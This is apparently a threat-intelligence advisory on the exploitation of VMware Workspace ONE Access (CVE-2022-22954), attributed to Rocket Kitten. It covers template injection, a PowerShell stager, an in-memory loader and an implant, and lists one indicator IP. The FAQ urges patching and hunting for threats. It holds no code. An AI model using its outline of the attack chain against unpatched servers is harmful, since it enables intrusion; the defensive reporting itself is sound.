The Shadow of Rocket Kitten: Exploring a Sophisticated VMware Exploit
- Actor Motivations: Exfiltration
- Attack Vectors: Code injection,Vulnerability Exploitation,Zero-Day Attack,Backdoor,Downloader
- Attack Complexity: Medium
- Threat Risk: High Impact/High Probability
Threat Overview
Morphisec identified exploitation of a VMware Workspace ONE Access vulnerability, believed to be the work of an APT group, likely the Iranian-linked Rocket Kitten. The attack involved server-side template injection and execution of PowerShell commands via the Tomcat prunsrv.exe process application, leading to full remote code execution. The attackers deployed a PowerShell stager that downloaded the PowerTrash Loader. The end payload was a Core Impact Agent. The tactics are known to enable ransomware or coin miners deployment, evading typical defenses like antivirus and endpoint detection and response.
Exploited Vulnerabilities
Extracted IOCs
- 185[.]117.90.187
Tip: 1 related IOCs (1 IP, 0 domain, 0 URL, 0 email, 0 file hash) to this threat have been found.
FAQs
VMware Workspace ONE Access Vulnerability (CVE-2022-22954) FAQ
Hackers are actively exploiting a newly discovered vulnerability in VMware Workspace ONE Access. By taking advantage of a flaw in how the server processes information, attackers can remotely run malicious commands on the hosting server, granting them unauthorized control over the system.
Cybersecurity researchers believe advanced persistent threat (APT) groups—highly skilled, often state-sponsored hacking teams—are responsible. The specific methods and advanced tools used in this campaign share strong similarities with Rocket Kitten, an APT group linked to Iran.
The primary goal of the attack is to establish a hidden foothold within a corporate network. Once inside, the attackers can deploy ransomware, install cryptocurrency miners, or establish backdoors that allow them to continuously monitor and control the network while evading security software.
The attacks do not appear to single out a specific industry; rather, they target the technology itself. The attackers are going after organizations utilizing unpatched versions of VMware Workspace ONE Access and Identity Manager, which are critical systems used for managing employee logins and secure access to corporate applications.
The attackers exploit a weakness in the server to run a hidden, encoded command. This command acts as a gateway, downloading a massive, disguised script that injects a remote-control hacking tool directly into the computer's active memory, leaving no trace on the hard drive.
VMware Identity Manager handles single sign-on and multi-factor authentication for an organization's most sensitive applications. Compromising this system is like stealing the master key to a building; it provides attackers with broad, privileged access to a company's wider network and data.
Organizations must immediately apply the security patches released by VMware to fix the vulnerabilities. Additionally, security teams should hunt for unusual activity on their servers, specifically looking for hidden commands or tools running exclusively in system memory.
This is a widespread and active threat. Because the vulnerability does not require an attacker to have prior administrative passwords to be successful, hackers have rapidly weaponized it and are actively scanning the internet to compromise any vulnerable, unpatched server they can find.